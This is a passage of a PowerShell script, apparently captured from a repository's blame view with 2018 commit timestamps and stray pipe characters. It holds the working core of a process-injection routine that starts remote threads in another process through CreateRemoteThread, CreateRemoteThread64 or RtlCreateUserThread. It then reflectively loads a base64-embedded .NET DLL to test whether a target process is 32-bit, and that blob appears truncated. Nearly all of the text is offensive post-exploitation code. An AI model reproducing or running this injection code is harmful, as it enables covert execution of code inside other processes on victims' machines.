$e = [Thread.Util]::CreateRemoteThread64($phandle.ToInt32(),$x.ToInt32(),0)
|
|
|
|
|
echo "CreateRemoteThread64"
|
|
|
|
|
$e = 1241
|
|
|
|
|
} else {
|
|
|
|
|
$e = [Inject]::CreateRemoteThread($phandle,0,0,[IntPtr]$x,0,0,0)
|
|
|
|
|
echo "CreateRemoteThread"
|
|
|
|
|
}
|
2018-07-23 08:55:15 +00:00
|
|
|
$Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
|
|
|
|
|
echo "[+] $e"
|
|
|
|
|
|
|
|
|
|
if ($e -eq 0) {
|
|
|
|
|
$TokenHandle = [IntPtr]::Zero
|
|
|
|
|
$c = [Inject]::RtlCreateUserThread($phandle,0,0,0,0,0,[IntPtr]$x,0,[ref] $TokenHandle,0)
|
|
|
|
|
echo "RtlCreateUserThread"
|
|
|
|
|
$hexVal = "{0:x}" -f $c
|
|
|
|
|
if ($hexVal -eq "c0000022") {
|
|
|
|
|
echo "[-] Access Denied 0xC0000022"
|
|
|
|
|
} else {
|
|
|
|
|
echo "[+] Dec: $c"
|
|
|
|
|
echo "[+] Hex: 0x$($hexVal)"
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
$Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
|
|
|
|
|
echo "[-] LastError: $Lasterror"
|
|
|
|
|
} else {
|
|
|
|
|
echo "[-] Failed using VirtualAllocEx"
|
|
|
|
|
$Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
|
|
|
|
|
echo "[-] LastError: $Lasterror"
|
|
|
|
|
echo ""
|
|
|
|
|
}
|
|
|
|
|
} catch {
|
|
|
|
|
echo $Error[0]
|
|
|
|
|
}
|
|
|
|
|
|
2018-10-12 14:04:45 +00:00
|
|
|
# Close all handles
|
|
|
|
|
|
2018-07-23 08:55:15 +00:00
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
$psloadedprochandler = $null
|
|
|
|
|
Function IsProcess-x86 ($processID) {
|
|
|
|
|
|
|
|
|
|
if ($psloadedprochandler -ne "TRUE") {
|
|
|
|
|
$script:psloadedprochandler = "TRUE"
|
|
|
|
|
$ps = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDACx/YFoAAAAAAAAAAOAAIiALATAAAAgAAAAGAAAAAAAAJicAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAANQmAABPAAAAAEAAAKgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAACcJQAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAALAcAAAAgAAAACAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAKgDAAAAQAAAAAQAAAAKAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAIJwAAAAAAAEgAAAACAAUAUCAAAEwFAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAAMQBAAAjfgAAMAIAAEACAAAjU3RyaW5ncwAAAABwBAAABAAAACNVUwB0BAAAEAAAACNHVUlEAAAAhAQAAMgAAAAjQmxvYgAAAAAAAAACAAABRzUAFAkAAAAA+gEzABYAAAEAAAAPAAAAAgAAAAEAAAADAAAADQAAAA0AAAACAAAAAQAAAAEAAAABAAAAAQAAAAAAegEBAAAAAAAGAOIA7QEGAE8B7QEGAC8AuwEPAA0CAAAGAFcAlAEGAMUAlAEGAKYAlAEGADYBlAEGAAIBlAEGABsBlAEGAG4AlAEGAEMAzgEGACEAzgEGAIkAlAEGADgCjQEAAAAAAQAAAAAAAQABAIEBEACmAQAAPQABAAEAAAAAAIAAliAcAiUAAQAAIAAAAAABAAEAEwACIAIAKwIJALUBAQARALUBBgAZALUBCgApALUBEAAxALUBEAA5ALUBEABBALUBEABJALUBEABRALUBEABZALUBEABhALUBFQBpALUBEABxALUBEAAuAAsALAAuABMANQAuABsAVAAuACMAXQAuACsAcQAuADMAcQAuADsAcQAuAEMAXQAuAEsAdwAuAFMAcQAuAFsAcQAuAGMAjwAuAGsAuQADACMABwAjAG0BQAEDABwCAQAEgAAAAQAAAAAAAAAAAAAAAACmAQAAAgAAAAAAAAAAAAAAGgAKAAAAAAAAAAAAADxNb2R1bGU+AG1zY29ybGliAHByb2Nlc3NIYW5kbGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBrZXJuZWwzMi5kbGwAUHJvY2Vzc0hhbmRsZXIuZGxsAFN5c3RlbQBTeXN0ZW0uUmVmbGVjdGlvbgBQcm9jZXNzSGFuZGxlcgAuY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMASXNXb3c2NFByb2Nlc3MAd293NjRQcm9jZXNzAE9iamVjdAAAAAAAAMe7zDzTzepJlqlyZm7cVhgABCABAQgDIAABBSABARERBCABAQ4EIAEBAgi3elxWGTTgiQECBgACAhgQAggBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAATAQAOUHJvY2Vzc0hhbmRsZXIAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMTgAACkBACQ1ZjgyNWQwMC00N2QwLTQ2YWItYTc5Ny1lNGE5Yjk1N2U1N2YAAAwBAAcxLjAuMC4wAAAAAAAAAAArf2BaAAAAAAIAAAAcAQAAuCUAALgHAABSU0RTRWkwPXJV1k+vS2U2WvlSPAEAAABDOlxVc2Vyc1xhZG1pblxzb3VyY2VccmVwb3NcUHJvY2Vzc0hhbmRsZXJcUHJvY2Vzc0hhbmRsZXJcb2JqXFJlbGVhc2VcUHJvY2Vzc0hhbmRsZXIucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPwmAAAAAAAAAAAAABYnAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIJwAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAABMAwAAAAAAAAAAAABMAzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAErAIAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAAiAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0AbQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAAAAAAEYADwABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABQAHIAbwBjAGUAcwBzAEgAYQBuAGQAbABlAHIAAAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMQAuADAALgAwAC4AMAAAAEYAEwABAEkAbgB0
|
|
|
|
|
$dllbytes = [System.Convert]::FromBase64String($ps)
|
|
|
|
|
$assembly = [System.Reflection.Assembly]::Load($dllbytes)
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
$processHandle = (Get-Process -id $processID).Handle
|
|
|
|
|
$is64 = [IntPtr]::Zero
|
|
|
|
|
try{
|
|
|
|
|
[ProcessHandler]::IsWow64Process($processHandle, [ref]$is64) |Out-Null
|
|
|
|
|
} catch {
|
|
|
|
|
|
|
|
|
|
}
|
|
|
|
|
$is64
|
|
|
|
|
|
2018-11-19 19:38:53 +00:00
|
|
|
}
|
